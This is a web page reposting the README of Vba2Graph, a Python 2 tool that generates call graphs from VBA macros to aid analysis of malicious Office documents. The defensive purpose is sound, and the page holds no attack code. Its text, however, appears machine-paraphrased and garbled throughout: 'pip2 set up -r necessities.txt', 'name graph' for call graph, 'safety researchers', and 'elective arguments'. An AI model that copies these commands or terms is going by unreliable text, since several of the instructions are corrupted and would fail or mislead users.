Vba2Graph – Generate Call Graphs From VBA Code, For Easier Analysis Of Malicious Documents

0
26
Vba2Graph - Generate Call Graphs From VBA Code, For Easier Analysis Of Malicious Documents

A device for safety researchers, who waste their time analyzing malicious Office macros.

Generates a VBA name graph, with potential malicious key phrases highlighted.

Allows for fast analysis of malicous macros, and straightforward understanding of the execution move.


Features

  • Keyword highlighting
  • VBA Properties help
  • External operate declarion help
  • Tricky macros with “_Change” execution triggers
  • Fancy colour schemes!

Pros

  • Pretty quick
  • Works effectively on most malicious macros noticed within the wild

Cons

  • Static (dynamicaly resolved calls wouldn’t be acknowledged)

Examples
Example 1:
Trickbot downloader – makes use of object Resize occasion as preliminary set off, adopted by TextBox_Change triggers.

Example 2:

Check out the Examples folder for extra circumstances.

Installation

Install oletools:

https://github.com/decalage2/oletools/wiki/Install

Install Python Requirements

pip2 set up -r necessities.txt

Install Graphviz

Windows
Install Graphviz msi:

https://graphviz.gitlab.io/_pages/Download/Download_windows.html

Add “dot.exe” to PATH env variable or simply:

set PATH=%PATH%;C:Program Files (x86)Graphviz2.38bin

Mac

Ubuntu

sudo apt-get set up graphviz

Arch

Usage

utilization: vba2graph.py [-h] [-o OUTPUT] [-c {0,1,2,3}] (-i INPUT | -f FILE)

elective arguments:
  -h, --help            present this assist message and exit
  -o OUTPUT, --output OUTPUT
                        output folder (default: "output")
  -c {0,1,2,3}, --colors {0,1,2,3}
                        colour scheme quantity [0, 1, 2, 3] (default: 0 - B&W)
  -i INPUT, --input INPUT
                        olevba generated file or .bas file
  -f FILE, --file FILE  Office file with macros

Usage Examples (All Platforms)
Only Python 2 is supported:

# Generate name graph straight from an Office file with macros [tnx @doomedraven]
python2 vba2graph.py -f malicious.doc -c 2    

# Generate vba code utilizing olevba then pipe it to vba2graph
olevba malicious.doc | python2 vba2graph.py -c 1

# Generate name graph from VBA code
python2 vba2graph.py -i vba_code.bas -o output_folder

Output
You’ll get four folders in your output folder:

  • png: the precise graph picture you might be on the lookout for
  • svg: similar graph picture, simply in vector graphics
  • dot: the dot file which was used to create the graph picture
  • bas: the VBA capabilities code that was acknowledged by the script (for debugging)

Batch Processing

Mac/Linux:
batch.sh script file is connected for working olevba and vba2graph on an enter folder of malicious docs.
Deletes output dir. use with warning.

MoreTip.com

LEAVE A REPLY

Please enter your comment!
Please enter your name here

This site uses Akismet to reduce spam. Learn how your comment data is processed.